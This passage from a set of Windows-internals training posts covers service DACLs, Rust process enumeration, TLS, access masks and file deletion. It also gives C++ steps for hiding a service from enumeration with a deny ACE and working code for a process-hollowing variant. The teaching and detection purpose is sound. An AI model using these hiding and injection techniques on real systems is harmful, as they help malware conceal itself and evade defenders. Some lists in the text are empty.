sc query.
A reasonable follow-up question is: how do you do the same thing programmatically?
This post shows one way to do it in C++ using the Windows security APIs. It’s not “hard,” but it is easy to get lost if you haven’t worked with security descriptors and ACLs before. The key is understanding what you’re modifying and what format it’s in.
A service has a security descriptor that controls who can do what with it. For our purposes, the important part is the DACL (Discretionary Access Control List).
The DACL contains ACEs (Access Control Entries). Each ACE is essentially a triplet: a principal (SID), an access mask, and a type (allow or deny).
To “hide” a service from standard enumeration, we deny the relevant “read/query” access to the principal doing the enumeration (for example, Administrators). The service can still exist and run; we’re just making it harder to query through the Service Control Manager (SCM) APIs.
If you want to reverse engineer what a tool is doing, start with Process Monitor.
When you change service permissions in Process Explorer, the actual change is not done by Process Explorer itself. The change is performed through the SCM, and you’ll see activity involving the service configuration in the registry.
You’ll find a key like:
HKLM\SYSTEM\CurrentControlSet\Services\<ServiceName>\Security
…and a value (often also named “Security”) that contains a binary blob. That blob is a security descriptor (it can be represented as SDDL text, but it’s stored as binary).
Important detail: editing the registry directly is not enough for immediate effect. The SCM does not necessarily re-read that value on every change. If you only edit the registry, the change may not apply until reboot. If you want it to take effect immediately, use the service security APIs.
Core service/security calls:
- OpenSCManager
- OpenService
- QueryServiceObjectSecurity
- SetServiceObjectSecurity

Supporting security calls:

- ConvertSecurityDescriptorToStringSecurityDescriptor (optional, for visibility/debugging)
- CreateWellKnownSid (for the Administrators SID)
- GetSecurityDescriptorDacl
- SetEntriesInAcl (build a new DACL that can grow)
- MakeAbsoluteSD (convert from self-relative to absolute)
- SetSecurityDescriptorDacl

Typical flow:
- OpenSCManager(nullptr, nullptr, SC_MANAGER_ALL_ACCESS)
- OpenService(hScm, serviceName, SERVICE_ALL_ACCESS)

In theory you can request a smaller access mask. In practice, when you’re building/testing, using SERVICE_ALL_ACCESS avoids “access denied” surprises while you’re still wiring everything up.
Call QueryServiceObjectSecurity requesting DACL_SECURITY_INFORMATION.
You’ll typically call it once with a small/NULL buffer to get the required size, then allocate and call again.
At this point it’s useful to convert what you got to SDDL text, just so you can see what you’re working with. Use ConvertSecurityDescriptorToStringSecurityDescriptor. Remember to free the returned string with LocalFree.
Also: save a recovery path before you experiment. One simple option is:
- sc sdshow <service> to capture the current SDDL
- sc sdset <service> <sddl> to restore it later

Do this in a VM if you can. Deny ACEs can lock you out in annoying ways.
Use CreateWellKnownSid(WinBuiltinAdministratorsSid, ...).
SIDs are variable length, so either size properly or just allocate a buffer of SECURITY_MAX_SID_SIZE and pass its size in/out.
The obvious approach is:
- GetSecurityDescriptorDacl
- AddAccessDeniedAce to add a deny ACE (for GENERIC_READ against Administrators)

This often fails with an error about allotted space / security information. That’s because the security descriptor returned by QueryServiceObjectSecurity is typically in self-relative form: a compact blob with offsets, not pointers, and there’s no spare room to grow the DACL inside that blob.
So you need to build a new DACL rather than trying to extend the existing one in-place.
Use SetEntriesInAcl with a single EXPLICIT_ACCESS entry:
- DENY_ACCESS
- GENERIC_READ (good enough for the demo)

SetEntriesInAcl returns an error code directly. If it fails, don’t waste time with GetLastError; use the returned error. If it succeeds, you now have newDacl that contains the original entries plus your new deny ACE.
You’ll typically free that allocated ACL later with LocalFree.
You might think you can just call:

SetSecurityDescriptorDacl(sd, TRUE, newDacl, FALSE)

…and then SetServiceObjectSecurity.
But this can fail with Invalid security descriptor. The reason is the same theme: the original descriptor is self-relative, and you’re trying to attach pointers/structures in a way that doesn’t match the format.
The fix is to convert to absolute form first.
Use MakeAbsoluteSD to convert the descriptor from self-relative to absolute.
Absolute descriptors contain pointers to their components (owner, group, DACL, SACL). Once you have an absolute descriptor, attaching a new DACL works as expected.
So:
- Convert to absolute form (MakeAbsoluteSD)
- Attach the new DACL (SetSecurityDescriptorDacl)
- Apply it to the service (SetServiceObjectSecurity)

If everything worked, you’ll see the effect immediately: the service disappears from Services.msc and sc query for callers that no longer have the needed query/read access.
In real code, don’t forget to close handles and free allocations:
- CloseServiceHandle for service/SCM handles
- LocalFree for SDDL strings returned by conversion APIs
- LocalFree for ACLs allocated by SetEntriesInAcl

For a short-lived demo program, the process exit will clean up memory, but it’s still good practice to do it properly.
This is a practical lesson in how Windows visibility depends on API paths and security descriptors, not just “what exists on disk.”
Services.msc and sc.exe enumerate services through the SCM, which enforces the service DACL. If you can’t query a service, it may not appear in your list at all.

If you’re doing DFIR, threat hunting, or systems triage, the takeaway is simple: when tools disagree, don’t stop at “it isn’t there.” Ask which path the tool is using (SCM vs registry), and check the security descriptor when enumeration results don’t make sense.
For builders and researchers, this is also a good reminder that Windows security APIs can be unforgiving: self-relative vs absolute formats matter, and “I can’t append an ACE” often means “this structure can’t grow in-place,” not that the idea is wrong.
This content is part of the free TrainSec Knowledge Library, where students can deepen their understanding of Windows internals, malware analysis, and reverse engineering. Subscribe for free and continue learning with us:
https://trainsec.net/library
In this post I’m looking at a simple Windows detail: a service can be running normally and still “disappear” from standard service enumeration. Nothing magical is happening. It’s just security. If a caller can’t query a service, the Service Control Manager (SCM) won’t show it to that caller.
Service configuration is stored in the system Registry under:
HKLM\SYSTEM\CurrentControlSet\Services
That key contains both services and device drivers (you can distinguish them using the Type value). Because services are registry-backed, many people assume that service visibility is purely a registry permission problem. That assumption is only sometimes true.
Services.msc (running inside MMC) uses the service control APIs to enumerate services. The same is true for sc.exe when you run commands like sc query.
Those APIs talk to the SCM’s internal database. They are not simply walking the Services registry key. And most importantly, enumeration is gated by access checks.
If the SCM can’t open a service with the access required for “read/query,” that service can drop out of the list for that caller. The service can still be running; you just won’t see it through the normal enumeration path.
A Windows service is an object managed by the SCM, and it has a security descriptor (with a DACL) that controls who can query it and manage it.
If the relevant query/read permissions are denied for your security context, standard enumeration won’t show the service. In the video I use Process Explorer as a convenient way to view and edit a service’s permissions. The important concept is the DACL, not the tool.
One reason this technique is confusing is that “hidden” does not mean “stopped.”
If you suspect a service is present but not visible through the usual UI, try to confirm it from a different angle:
The point is not that these tools are “better.” The point is that they’re giving you different views of the same system.
When service permissions block enumeration, you typically see:
- In sc query, the service doesn’t show up in the full list.
- Querying the service by name fails with “Access denied” rather than “the specified service does not exist.”

That last point matters. “Not found” means the SCM can’t locate it. “Access denied” means the SCM found it, but you’re not allowed to query it.
A detail that surprises people is that this can happen even when you run the management tool “as administrator.”
Being elevated does not automatically mean you can query every service. The SCM evaluates the service’s DACL against your token, and explicit deny entries take precedence over allow entries. Windows even warns about this: deny ACEs are evaluated before allow ACEs.
There’s also a practical escape hatch: ownership. The owner of an object is in a privileged position and can recover access by changing the DACL. That’s why these changes are reversible if you still have sufficient rights.
Not every tool discovers services through the SCM APIs. Autoruns is a good example: it can enumerate services by reading the registry directly.
So a service that disappears from Services.msc can still appear in Autoruns, because Autoruns is looking at HKLM\SYSTEM\CurrentControlSet\Services rather than relying on SCM enumeration.
This is the defensive lesson: don’t trust a single enumeration path.
Enumerate services via the SCM APIs (Services.msc, sc.exe, PowerShell), and separately enumerate the Services registry key. A service present in the registry but missing from SCM results is a strong signal that permissions (or corruption) are involved.
Look for nonstandard DACLs, especially explicit deny entries against principals that normally have query access. Comparing against a known-good baseline for similar services on the same OS build is usually faster than guessing.
Pay attention to the difference between:
That distinction alone often tells you whether you’re dealing with visibility/permissions versus a missing service.
Windows visibility depends on access checks, and different tools see different slices of the system depending on which APIs they use.
When tools disagree, don’t stop at “it isn’t there.” Ask what path the tool is using (SCM APIs or Registry) and what permissions that path requires.
This content is part of the free TrainSec Knowledge Library, where students can deepen their understanding of Windows internals, malware analysis, and reverse engineering. Subscribe for free and continue learning with us:
https://trainsec.net/library
In this post I’m going to show how to get started with Windows system programming in Rust. The assumption is that you know a bit of Rust already, but I’ll keep the Rust-specific parts simple and focus on what changes when you start calling Win32 APIs.
The example I’m going to build is a classic: enumerate processes using the Toolhelp APIs (CreateToolhelp32Snapshot, Process32First, Process32Next). It’s simple enough to be a first project, but it forces us to deal with the key topics: crates, features, unsafe, error handling, and UTF-16 strings.
Rust’s safety guarantees apply to safe Rust: you don’t get use-after-free bugs, garbled pointers, or the usual memory hazards that come from manual lifetime management. But the moment you start interacting with an operating system API that was designed for C, you’re going to cross into unsafe territory.
That’s not a Rust limitation. It’s just reality: the OS APIs are mostly C-style interfaces. Rust can’t prove at compile time that you’re using them correctly, so you explicitly mark the call site as unsafe. Think of it as telling the compiler: “I’m taking responsibility for this part.”
windows-sys vs windows

For Windows specifically, you have a few options in the ecosystem, but Microsoft maintains two crates that matter here:
- windows-sys: low-level bindings, close to the raw Win32 types and functions.
- windows: higher-level wrappers built on top of windows-sys, generally more ergonomic for Rust code.

For this example, I use the windows crate. It still exposes the Win32 calls, but it’s a better starting point if you want code that feels like Rust rather than a direct mechanical translation of C headers.
Start a new executable project:
cargo new (I call the sample project ProcList)

Most people use VS Code with the Rust Analyzer plugin, which is fine. I’m using RustRover from JetBrains in the video, but the tooling choice isn’t the point—Cargo and the crate setup are what matter.
You’ll see two things immediately:
- Cargo.toml (your project metadata and dependencies)
- main.rs (the default “Hello world”)

Add the windows crate to Cargo.toml. The key detail is features.
Win32 is huge. You do not want to enable everything. The correct approach is to enable the minimal set of modules you actually use.
For Toolhelp process enumeration, you’ll need the module that contains the Toolhelp APIs, and typically you’ll also need Foundation types.
A practical tip: don’t guess feature names. Use the windows-rs documentation tooling that maps API names to features. If you search for a function like CreateToolhelp32Snapshot, it tells you which feature to enable. This saves time, and it avoids the “why won’t this import compile?” loop.
Once you import the right modules, you can start calling Win32.
The first Toolhelp call is CreateToolhelp32Snapshot.
Two things you’ll notice immediately:
- Calls are wrapped in unsafe { ... }. That’s normal, as these are C APIs, which are unsafe by definition.
- Instead of checking GetLastError after every step, many of the bindings surface results as Rust Result<> values.

For a first demo, it’s common to use unwrap() to keep the example focused. That means: if something fails, crash and show the error. For production code, you’ll usually do proper error handling, but for learning the mechanics, unwrap() keeps the noise down.
The Toolhelp enumeration pattern is the same as in C and C++:
- the PROCESSENTRY32 structure
- Process32First
- Process32Next

In Rust, there are a few details you must get right.
On Windows, the “real” string API surface is UTF-16. For Toolhelp, that means using the wide types and functions:
- PROCESSENTRY32W
- Process32FirstW
- Process32NextW

The process name field is a fixed-size UTF-16 buffer. If you print it naïvely, you’ll get a dump of numbers, not a readable name.
We’ll fix that in a minute.
Toolhelp functions require you to set dwSize to the size of the structure.
In C++ you often do something like:

entry.dwSize = sizeof(entry);

In Rust, you can’t leave memory uninitialized. You typically start with a zeroed structure (or a default initializer provided by the bindings), then set:
entry.dwSize = size_of::<PROCESSENTRY32W>() as u32;If dwSize is wrong, enumeration fails. This is one of those Win32 rules you can’t ignore.
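In Rust that pattern looks roughly like this. To keep the snippet self-contained I’m using a stand-in struct; in real code you’d use PROCESSENTRY32W from the windows crate bindings instead:

```rust
use std::mem::size_of;

// Stand-in for the real PROCESSENTRY32W from the windows crate;
// field names mirror the Win32 structure for illustration only.
#[repr(C)]
#[allow(dead_code)]
struct ProcessEntry32W {
    dw_size: u32,
    th32_process_id: u32,
    sz_exe_file: [u16; 260], // MAX_PATH-sized UTF-16 buffer
}

fn main() {
    // Start fully zeroed (no uninitialized memory in safe Rust)...
    let mut entry = ProcessEntry32W {
        dw_size: 0,
        th32_process_id: 0,
        sz_exe_file: [0u16; 260],
    };
    // ...then set dwSize, the rule Toolhelp enforces before enumerating.
    entry.dw_size = size_of::<ProcessEntry32W>() as u32;
    assert_eq!(entry.dw_size as usize, size_of::<ProcessEntry32W>());
}
```

With the real bindings the shape is identical; only the struct type comes from the windows crate.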
Rust variables are immutable by default.
If the API is going to write into your process entry structure, the structure must be declared with mut. The snapshot handle doesn’t necessarily need to be mutable, but the entry does.
This is a small Rust difference that matters when you translate Win32 patterns into Rust.
The executable name in PROCESSENTRY32W is a UTF-16 buffer. Rust natural strings are UTF-8.
A common and practical approach is: convert the UTF-16 buffer to a String with a lossy conversion, then trim the trailing '\0' padding.

For example (conceptually):

String::from_utf16_lossy(&entry.szExeFile), then trim the '\0' characters.

That gives you a normal readable process name.
A small Rust feature that helps here is variable shadowing. You can reuse the same variable name for each transformation step (raw → string → trimmed) without mutating the original binding. It keeps the code readable.
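Putting the conversion and the shadowing together, here is a self-contained sketch with a hand-built buffer standing in for szExeFile:

```rust
fn main() {
    // Stand-in for PROCESSENTRY32W.szExeFile: "notepad.exe" encoded as
    // UTF-16, followed by the zeros a fixed-size buffer would contain.
    let mut sz_exe_file = [0u16; 260];
    for (i, unit) in "notepad.exe".encode_utf16().enumerate() {
        sz_exe_file[i] = unit;
    }

    // Shadowing: the same name is reused for each transformation step.
    let name = String::from_utf16_lossy(&sz_exe_file); // still padded with '\0'
    let name = name.trim_end_matches('\0');            // strip the padding
    assert_eq!(name, "notepad.exe");
    println!("{name}");
}
```

The two `let name` lines are the shadowing in action: raw buffer to String to trimmed &str, one readable name per step, no mutation.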
At a high level, the logic looks like this:

- Create the snapshot and set dwSize on the entry structure.
- If Process32FirstW succeeds, process the first entry.
- Loop while Process32NextW succeeds, processing each subsequent entry.

The “Rust work” is mostly about correctness at the boundaries:
- unsafe where required

If you do Windows Internals work, you end up writing small tools sooner or later. Sometimes it’s for debugging. Sometimes it’s for IR. Sometimes it’s for research or experiments.
Rust gives you a good balance:
- unsafe blocks

This example is intentionally simple, but it builds the foundation you need for anything bigger:

- using the windows crate properly

Once you can do process enumeration cleanly, it’s a short step to building more advanced tooling.
This content is part of the free TrainSec Knowledge Library, where students can deepen their understanding of Windows internals, malware analysis, and reverse engineering. Subscribe for free and continue learning with us:
https://trainsec.net/library
But that mindset misses the real power of the tool.
WinDbg is not just a debugger used in emergencies. It is one of the most powerful research tools available for understanding how Windows actually works. Microsoft engineers use it to debug the operating system itself. With the right setup and workflow, it becomes a microscope for exploring Windows internals.
On April 7th, 2026, I’ll be running a live 4-hour masterclass where we will use WinDbg specifically as a research platform for exploring Windows components.
This session is designed for Trainsec students who want to go beyond theory and develop practical techniques for investigating the system from the inside.

Registration, syllabus and more: https://trainsec.net/windows-research-with-windbg-live-4h/
During the session we will explore several practical areas:
The focus will be on real investigative workflows and techniques that can be applied when studying Windows internals, reverse engineering components, analyzing system behavior, or troubleshooting complex issues.
Many Trainsec courses dive deep into Windows internals, security research, reverse engineering, and malware analysis. WinDbg is one of the tools that ties these areas together.
If you know how to drive WinDbg effectively, you gain the ability to:
In short, WinDbg turns documentation and theory into observable reality.
The ticket for the event is $49, but the admission works a bit differently than a typical webinar.
Every ticket also includes a $49 voucher that can be used toward any course in the Trainsec catalog.
In other words, if you are planning to take a Trainsec course anyway, the ticket effectively becomes store credit you can use later.
Windows Research with WinDbg – Live Masterclass
Date: April 7, 2026
Time: 10:00 AM – 2:00 PM (EDT)
Duration: 4 hours (live session)
Seats: Limited
Admission: $49 (includes a $49 Trainsec course voucher)
If you want to get more comfortable using WinDbg as a research tool rather than a last-resort debugger, this session will give you the workflows and techniques to start doing that.
Register now to reserve your seat.
Registration, syllabus and more: https://trainsec.net/windows-research-with-windbg-live-4h/
In this post, I’ll explain what TLS is, where you’ve already been using it (whether you noticed or not), and then I’ll show a practical use case: avoiding a nasty recursion problem when hooking an allocation API and trying to log allocations.
TLS is about storing information per thread, while keeping access uniform.
That means I can write code that says “get my TLS value,” and it will always return the value for the current thread. Another thread running the same code will read its own value, from its own storage, using the exact same access pattern.
The whole point is that each thread gets its own data, and threads don’t stomp on each other.
On Windows, you can think of TLS as an array of “slots” per thread:
Windows guarantees at least 64 TLS slots, and in practice you can go higher (an additional 1024 expansion slots are available on top of the initial 64).
You’ve seen TLS patterns in both the C runtime and the Windows API.
errno And Other CRT “Globals”

In old (and current) C code, errno is a global variable. In a multi-threaded process, that’s a data race waiting to happen. One thread calls (say) fopen, while another thread does some I/O, and suddenly your “last error” isn’t your last error anymore.
So modern CRT implementations make errno effectively thread-local. In practice, it’s accessed through a function (in Visual Studio you’ll see it as a macro calling an internal function), and that function returns the per-thread value.
The same idea applies to other classic CRT functions that need per-thread state, like strtok (which keeps internal state between calls). That state can’t safely be process-global in a multi-threaded world, so it ends up being thread-local.
GetLastError And The TEB

On the Windows side, GetLastError is another obvious example: it can’t be a single global variable either.
The value is stored per thread, and you can see it in the TEB (Thread Environment Block) in a debugger. Each thread has its own TEB, so each thread has its own “last error” value.
This is TLS in spirit: uniform access (“give me my last error”) with per-thread storage under the hood.
TLS is not just “a programming convenience.” It’s a mechanism you’ll run into when you’re:
The key mental model is: uniform access, thread-specific storage. Once that clicks, a lot of Windows behavior becomes easier to explain—and certain “impossible” problems (like passing state into a hooked function with no extra parameters) become straightforward.
This content is part of the free TrainSec Knowledge Library, where students can deepen their understanding of Windows internals, malware analysis, and reverse engineering. Subscribe for free and continue learning with us:
https://trainsec.net/library
An access mask is one of those things that’s easy to ignore until something doesn’t work. A good example is when an API call fails with Access Denied, even though you think you have a valid handle. In many cases, the missing piece is simply that the handle doesn’t have the rights that specific call requires. So the goal here is to make access masks less mysterious and more observable.
An access mask is a compact way to represent access rights for an object. It’s a 32-bit value, where different bits have different meanings. Those bits represent what someone can do with the object.
Access masks typically show up in two locations:

- In a handle: the access that was granted when the object was opened.
- In an ACE inside an ACL: the access that the entry allows or denies.
So, the access mask is a core part of both “what access did I actually get on this handle?” and “what access is allowed according to the ACL?”
A quick way to see access masks on handles is Process Explorer. Pick any handle, and you’ll see each handle’s properties: the handle value, object type, object name (if it has one), and the Access column.
That Access value is the access mask—a set of bits corresponding to a 32-bit number. Since an access mask is just a number, you usually need Windows headers or documentation to translate it into something meaningful.
To make this easier, there’s also a Decoded Access column that shows the access mask in a readable form. That way, you don’t have to go hunting through headers every time you want to understand what a handle can actually do.
For example:
Another useful example is a registry key handle opened with READ_CONTROL and KEY_READ only. If code tries to write to that registry key using this handle, it will fail with Access Denied, because the handle simply doesn’t have write permissions.
One detail that trips people up: if you double-click a handle in Process Explorer, the dialog you get is about the object, not about the handle. The handle-specific access is what you see in the handle list itself.
Another view is the classic Windows security dialog (for example, via the Security tab and then Advanced).
In the Advanced view you’ll see the list of ACEs. Each ACE is essentially a triplet: a principal (identified by its SID), an access mask, and a type (allow or deny).
Sometimes the UI shows “Special.” That doesn’t mean it’s unusual—it usually means there isn’t a single neat label for that exact combination of bits. If you click Edit or View, you can see the detailed permissions behind that entry (including things like delete, change permissions, change owner, and others).
You can also view the same information through a kernel debugger. The underlying idea is:
When I do this locally in a debugger, I can locate the object, then look at the object header structure. One practical detail is that the object header is 48 bytes before the object.
From there, you can grab the security descriptor pointer and use the !sd command to dump it. If you get an error related to flags, one fix is to zero out the last digit of the address—on 64-bit Windows, object addresses are 16-byte aligned, so the lower four bits are always zero.
Once you dump the security descriptor, you’ll see the ACEs listed with SIDs and access masks (in a more raw form). The ordering and identities match what you see in the Security UI, but here you’ll also see the numeric masks directly.
A 32-bit access mask includes several categories of rights:
The lower 16 bits are specific rights, and these depend on the object type. A process has different specific rights than a file, thread, desktop, and so on. There can be no more than 16 object-specific bits.
There are also standard rights that apply broadly across object types:

- DELETE
- READ_CONTROL (read the security descriptor)
- WRITE_DAC (change the DACL)
- WRITE_OWNER (change the owner)
- SYNCHRONIZE (discussed below)
Ownership matters because the owner always has a certain level of control—objects should not become permanently inaccessible due to a bad DACL. And if you have the Take Ownership privilege (administrators typically do by default), you can change the owner even without having “write owner” granted through the normal access bits.
SYNCHRONIZE is the right to wait on an object. It only makes sense for objects where “signaled” has meaning (processes, threads, events, mutexes, semaphores, and similar). A process, for example, becomes signaled when it terminates.
MAXIMUM_ALLOWED means “give me the maximum access I can get without failing.” Whether that’s enough for what you want to do depends on your use case.
Finally, there are generic rights:

- GENERIC_READ
- GENERIC_WRITE
- GENERIC_EXECUTE
- GENERIC_ALL
These are translated behind the scenes into object-specific rights. One way to see what they translate to is by looking at object-type mappings in Object Explorer (for example, for process objects: generic read maps to a specific set of rights such as VM read and query information).
In general, if you’re doing programming work, I recommend being explicit rather than using generic rights. Generic rights can request more than you actually need—and if you ask for more than you need, you may end up getting nothing.
Let’s say you want to terminate a process. You call OpenProcess, and the first parameter is the desired access mask—what you want to be able to do if the call succeeds.
A lazy approach is to request PROCESS_ALL_ACCESS. That’s usually a bad idea: you’re asking for far more than you need, and the call can fail precisely because of rights you never intended to use.
If your goal is termination, you should request PROCESS_TERMINATE. If you also want to wait for the process to actually terminate, add SYNCHRONIZE.
Now here’s the catch: if you then try to call GetProcessTimes using that handle, it will fail with Access Denied. Why? Because GetProcessTimes requires PROCESS_QUERY_INFORMATION or PROCESS_QUERY_LIMITED_INFORMATION, and you didn’t ask for that access—so you don’t have it in this handle.
The fix isn’t “use ALL_ACCESS.” The fix is to request exactly what you need: PROCESS_TERMINATE | SYNCHRONIZE | PROCESS_QUERY_LIMITED_INFORMATION.
That’s the larger point: the access mask stored in the handle directly controls what you can successfully do with it.
Access masks show up everywhere once you start paying attention. They’re in the handles you open, and they’re in the ACEs that decide who gets what access.
If you can read access masks, you stop guessing: you know what a given handle can actually do, and what each ACE actually grants or denies.
That’s a practical skill in Windows internals work, and it also shows up in security contexts where you’re trying to understand what a process can actually do with the objects it has open.
If you want more material like this, browse the free TrainSec Knowledge Library:
https://trainsec.net/library/
And if you’re following along, try inspecting access masks in two places for the same system: a handle view (Process Explorer) and an ACE view (Security → Advanced). Seeing both perspectives is usually where the concept clicks.
“How do you delete a file in Windows?” looks like a beginner question, but it’s a great excuse to peel back the layers and see what Windows is really doing.
At the surface, you can just open File Explorer and delete a file. But if you’re studying Windows internals, the interesting part is what happens behind the scenes: which APIs are used, what flags matter, and how you can prove it with the right tooling.
In Explorer, there’s an important difference: a plain Delete sends the file to the Recycle Bin, while Shift+Delete bypasses the Recycle Bin and deletes the file permanently.
So if your question is “how do I permanently delete a Windows file?” in the everyday Explorer sense (i.e., don’t send it to the Recycle Bin), Shift+Delete is the key.
There are plenty of tools you can use:
- the del command in a Command Prompt
- Remove-Item in PowerShell
- DeleteFile
- SHFileOperation (more flexible — for example, deleting directories that contain files)

Different entry points… but internally, file deletion comes down to a small set of mechanisms.
In reality, there are two ways to delete a file in Windows.
The first way is:
- Open the file with delete-on-close semantics (via CreateFile or a native API like NtOpenFile)
- Close the handle (CloseHandle)

This is a clean model: open the file with the right flag, then close the handle, and the deletion happens.
The second way is used when the file is already open and you decide you want to delete it:
- Call SetFileInformationByHandle
- Pass FileDispositionInformation (or the extended version)

If you’ve done any kernel driver work, this aligns with IRP_MJ_SET_INFORMATION being sent down to the file system driver.
To figure out what a tool is doing (what del does, what DeleteFile does, what anything does), you need visibility.
That’s where Process Monitor (ProcMon) from Sysinternals comes in.
A simple workflow:
- Set a filter on the path of a test file, test1.txt

One thing you’ll notice right away: even typing in Command Prompt can trigger file activity, because of auto-complete. You may see a CreateFile with read-style access before you even run the delete command. That’s normal background behaviour — it’s not the deletion yet.
When you actually run del test1.txt, ProcMon makes it very clear what’s happening.
You’ll see a CreateFile where:
That tells you del is using the first mechanism:
It’s simple — and very effective.
Next, I wrote a tiny program that just calls DeleteFile and passes in the filename (argv[1]). The deletion works, but the mechanism is different.
In ProcMon you’ll see:
- CreateFile with DELETE access, but without the delete-on-close option

So it has to use the other mechanism — and you can see it directly:
If you open the call stack in ProcMon, you can literally follow it:
- Your code calls DeleteFile
- DeleteFile calls NtSetInformationFile

On this version of Windows, DeleteFile is implemented using the disposition information approach.
If you enable Advanced Output in ProcMon, you can see the major function codes directly, which makes the mental model even cleaner:

- IRP_MJ_CREATE
- IRP_MJ_SET_INFORMATION
- IRP_MJ_CLOSE
Once you see those three in context, file deletion stops being mysterious.
Now that you’ve got the model, you can apply it to anything:
- Remove-Item in PowerShell
- SHFileOperation

The point is: you don’t need to guess. You can verify exactly what’s happening.
For TrainSec students, this example is important not because deleting a file is hard, but because it forces you to build a real mental model of Windows behaviour below the surface.
A lot of people learn Windows behaviour as a loose checklist of APIs. That approach hides the mechanics. In this deletion walkthrough, the mechanics are the whole lesson: there are two core deletion paths, access rights matter, and you can validate everything by watching the real operations (create, close, set-information) as they happen.
This is exactly the kind of thinking TrainSec is designed to train: stop treating Windows as a black box, and start reasoning about it based on what the system is actually doing.
This content is part of the free TrainSec Knowledge Library, where students can deepen their understanding of Windows internals.
Subscribe for free and continue learning with us: https://trainsec.net/library/.
Process hollowing is usually described as creating a process in a suspended state, removing its original executable image, and replacing it with a different one. From the outside, the process appears normal, but the code running inside is not what you expect.
In this article, I explore a slightly different idea.
Instead of unmapping the original executable, we leave it in place. The original image stays mapped in memory, inactive but present. We then map a second executable into the same process and redirect execution to it. The result is a process that still looks legitimate when inspected at a high level, while actually running different code.
The flow looks like this:
First, an attacker process creates a target process in a suspended state. At this point, only the original image and NTDLL are mapped, and no user code has executed yet.
Next, memory is allocated inside the target process for a replacement executable. The executable is rebased to match the allocated address, avoiding the need for a full manual loader.
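The rebasing step boils down to walking the PE base-relocation directory and adding the delta between the preferred and actual base to every absolute address. A sketch of that idea, assuming a 64-bit image that has already been mapped section by section so that RVAs are valid offsets into the buffer (this is an illustrative implementation, not the article’s exact code):

```cpp
// Sketch: rebase a mapped 64-bit PE image so it can run at newBase
// instead of its preferred ImageBase, by applying base relocations.
#include <windows.h>

void ApplyRelocations(BYTE* image, ULONGLONG newBase) {
    auto dos = (PIMAGE_DOS_HEADER)image;
    auto nt  = (PIMAGE_NT_HEADERS)(image + dos->e_lfanew);
    ULONGLONG delta = newBase - nt->OptionalHeader.ImageBase;
    if (delta == 0) return;  // already at the preferred base

    auto& dir = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC];
    if (dir.Size == 0) return;  // no relocations to apply

    auto reloc = (PIMAGE_BASE_RELOCATION)(image + dir.VirtualAddress);
    BYTE* end  = image + dir.VirtualAddress + dir.Size;

    while ((BYTE*)reloc < end && reloc->SizeOfBlock) {
        // Each block covers one 4 KB page and holds 16-bit entries:
        // 4 bits of type, 12 bits of offset within the page.
        WORD* entries = (WORD*)(reloc + 1);
        DWORD count = (reloc->SizeOfBlock - sizeof(*reloc)) / sizeof(WORD);
        for (DWORD i = 0; i < count; i++) {
            WORD type   = entries[i] >> 12;
            WORD offset = entries[i] & 0xFFF;
            if (type == IMAGE_REL_BASED_DIR64)  // 64-bit absolute address
                *(ULONGLONG*)(image + reloc->VirtualAddress + offset) += delta;
        }
        reloc = (PIMAGE_BASE_RELOCATION)((BYTE*)reloc + reloc->SizeOfBlock);
    }
    nt->OptionalHeader.ImageBase = newBase;  // record the new base
}
```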
The rebased image is then mapped and copied into the target process, including headers and all sections. For simplicity, all memory is marked as execute, read, and write, even though this is not ideal from a stealth perspective.
After that, the Process Environment Block is updated so the loader sees the correct image base. The entry point is written into the suspended thread context, and the thread is resumed.
At this point, the original executable image is still present in memory, but it is dormant. The replacement image is what actually runs.
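Put together, the flow described above might be sketched like this. Error handling is omitted; payloadImage, payloadSize, and payloadEntryRva are assumed to come from the earlier rebasing and mapping steps, and the Rcx/Rdx usage is the convention commonly observed for the initial thread of a 64-bit suspended process:

```cpp
// Sketch of the overlay-hollowing flow: suspended process, remote copy
// of the rebased image, PEB patch, thread-context redirect, resume.
#include <windows.h>

void RunOverlayHollow(const wchar_t* targetExe,
                      BYTE* payloadImage, SIZE_T payloadSize,
                      DWORD payloadEntryRva) {
    // 1. Create the target suspended: only its image and NTDLL are mapped.
    STARTUPINFOW si = { sizeof(si) };
    PROCESS_INFORMATION pi = {};
    CreateProcessW(targetExe, nullptr, nullptr, nullptr, FALSE,
                   CREATE_SUSPENDED, nullptr, nullptr, &si, &pi);

    // 2. Allocate memory for the replacement image (RWX for simplicity,
    //    which, as noted above, is not ideal from a stealth perspective).
    LPVOID remoteBase = VirtualAllocEx(pi.hProcess, nullptr, payloadSize,
                                       MEM_COMMIT | MEM_RESERVE,
                                       PAGE_EXECUTE_READWRITE);

    // 3. Copy the rebased image, headers and all sections, into the target.
    WriteProcessMemory(pi.hProcess, remoteBase, payloadImage,
                       payloadSize, nullptr);

    // 4. Point the PEB's ImageBaseAddress at the new image and set the
    //    suspended thread's entry point. On x64, Rdx holds the PEB pointer
    //    at process start, and ImageBaseAddress sits at PEB offset 0x10.
    CONTEXT ctx = {};
    ctx.ContextFlags = CONTEXT_FULL;
    GetThreadContext(pi.hThread, &ctx);
    WriteProcessMemory(pi.hProcess, (BYTE*)ctx.Rdx + 0x10,
                       &remoteBase, sizeof(remoteBase), nullptr);
    ctx.Rcx = (DWORD64)remoteBase + payloadEntryRva;  // new entry point
    SetThreadContext(pi.hThread, &ctx);

    // 5. Resume: the original image stays mapped but dormant, while the
    //    replacement image runs.
    ResumeThread(pi.hThread);
    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
}
```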
This approach has clear limitations. Rebasing modifies the executable on disk. Memory protections are overly permissive. Error handling is minimal. Still, it is a useful experiment for understanding how process creation, image loading, and execution really work on Windows.
If you are interested in detection, evasion, or low-level Windows internals, this kind of hands-on exploration is valuable. The code is not the point. The mechanics are.
For TrainSec students, this example is important not because it is a perfect injection technique, but because it forces you to understand how Windows really works below the surface.
Many people learn process hollowing as a checklist of API calls. That approach often hides the real mechanics. In this variant, you are exposed to the actual building blocks: how a process is created, how images are mapped, how the PE structure is laid out in memory, how the loader relies on the PEB, and how execution flow is controlled through thread context.
This kind of understanding is critical for several roles.
For malware researchers, it shows why small changes in loading behavior can break assumptions made by static and dynamic analysis tools.
For detection and EDR engineers, it highlights why relying only on classic hollowing patterns is not enough. The original image is still present, memory layout looks mostly normal, and execution happens elsewhere.
For reverse engineers, it provides a concrete example of how loaders, rebasing, and section mapping interact, which helps when debugging crashes, unpacking malware, or analyzing custom loaders.
For exploit developers and low-level Windows developers, it reinforces the idea that Windows APIs are only part of the story. The real behavior depends on internal structures like the PEB, NT headers, and thread state.
